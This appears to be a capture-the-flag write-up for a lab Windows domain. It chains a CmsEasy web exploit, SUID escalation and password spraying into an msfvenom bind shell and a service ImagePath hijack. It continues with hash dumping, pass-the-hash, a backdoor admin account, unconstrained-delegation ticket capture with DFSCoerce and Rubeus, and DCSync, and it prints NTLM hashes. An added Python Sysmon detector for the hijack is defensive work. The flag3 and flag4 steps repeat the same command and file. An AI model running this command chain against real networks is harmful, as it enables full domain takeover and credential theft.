flag1
./fscan -h 39.101.135.65 -p 1-65535
Visit the web service: it is CmsEasy.
Browse to ./admin and log in to the backend with the weak credentials admin/123456.
Use the existing exploit: CmsEasy_7.7.5_20211012 has arbitrary file write and arbitrary file read vulnerabilities | jdr
Connect with AntSword.
SUID privilege escalation to read flag1:
find / -perm -u=s -type f 2>/dev/null
diff --line-format=%L /dev/null /home/flag/flag01.txt
The hint we are given is clearly a domain user:
WIN19\Adrian
flag2
Upload fscan and frp through AntSword, scan the internal network and set up a tunnel.
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.45 is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:445 open
172.22.4.36:3306 open
172.22.4.7:88 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题
Combined with the hint WIN19\Adrian, target 172.22.4.45; password spraying yields babygirl1, which turns out to be an expired password.
proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19
You can connect over RDP and change the password:
proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp
Enter the original credentials first, then set a new password and log in.
Reading flag2 directly is denied (no permission).
A risky file was found; roughly, it says that the registry key of the gupdate service can be modified extensively, including changing its configuration and deleting and creating entries.
msfvenom -p windows/meterpreter/bind_tcp LPORT=1337 -f exe > exp.exe
Upload the file through the Kali share.
Modify the registry ImagePath and start the service:
reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\exp.exe"
sc start gupdate
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 1337
exploit
In ps, pick a process running as SYSTEM and migrate into it.
cat /users/administrator/flag/flag02.txt
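The service ImagePath rewrite above leaves a clear trace for defenders. The following is an added Python example (not from the original writeup) that scans Sysmon Event ID 13 (RegistryEvent: value set) records for a service ImagePath redirected into a user-writable directory; the records are constructed here to mirror the gupdate step in this writeup.

```python
import re

# Constructed Sysmon-style Event ID 13 records modelled on the gupdate
# ImagePath hijack in this writeup. Not real logs.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "WIN19\\Adrian",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\gupdate\ImagePath",
     "Details": r"C:\Users\Adrian\Desktop\exp.exe"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wuauserv\ImagePath",
     "Details": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"EventID": 13, "User": "WIN19\\Adrian",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\gupdate\Start",
     "Details": "DWORD (0x00000003)"},
]

# Matches the ImagePath value of any service key and captures the service name.
SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\(?P<svc>[^\\]+)\\ImagePath$",
    re.I)

# Locations an unprivileged local user can normally write to; a service
# binary living there is a strong signal of a hijack (assumed list).
USER_WRITABLE = re.compile(
    r'^"?(C:\\Users\\|C:\\Windows\\Temp\\|C:\\Temp\\|C:\\ProgramData\\)', re.I)


def detect_imagepath_hijack(events):
    """Return (service, user, new_path) for every registry value-set event
    that points a service ImagePath into a user-writable directory."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = SERVICE_IMAGEPATH.match(ev.get("TargetObject", ""))
        if not m:
            continue  # not a service ImagePath value (e.g. Start type)
        new_path = ev.get("Details", "")
        if USER_WRITABLE.match(new_path):
            hits.append((m.group("svc"), ev.get("User"), new_path))
    return hits


if __name__ == "__main__":
    for svc, user, path in detect_imagepath_hijack(SAMPLE_EVENTS):
        print(f"ALERT service={svc} user={user} imagepath={path}")
```

Pair this with an audit of the service key ACLs (the "risky file" the writeup mentions is exactly such a finding) so the weak permission is removed rather than only detected after the fact.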
flag3
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Pass-the-hash as administrator:
proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk
Create a user with administrator privileges:
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add
Connect over RDP again (convenient for running the uploaded tools as administrator):
proxychains4 rdesktop 172.22.4.45 -u Z3r4y -d WIN19 -p '0x401@admin' -r disk:share=/home/kali/Desktop/tmp
Dump hashes with msf:
load kiwi
creds_all
Check the delegation relationships in the domain:
proxychains4 python findDelegation.py xiaorang.lab/'WIN19$' -hashes :5943c35371c96f19bda7b8e67d041727 -dc-ip 172.22.4.7
There is an unconstrained delegation.
First have WIN19 listen for incoming tickets:
C:\Users\Z3r4y\Desktop\Rubeus4.0.exe monitor /interval:1 /filteruser:DC01$ > C:\Users\Z3r4y\Desktop\hash.txt
Then use the forced-authentication vulnerability to make the DC authenticate to WIN19 and capture its TGT:
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :dd5b235421f0f6dbdb25a4c6340c5d12 -d xiaorang.lab WIN19 172.22.4.7
Then import the ticket:
C:\Users\Z3r4y\Desktop\Rubeus4.0.exe ptt /ticket:<base64 TGT>
Dump hashes with mimikatz:
lsadump::dcsync /domain:xiaorang.lab /all /csv
Pass-the-hash:
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/[email protected] -codec gbk
Read flag3:
type c:\users\Administrator\flag\flag04.txt
flag4
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/[email protected] -codec gbk
type c:\users\Administrator\flag\flag04.txt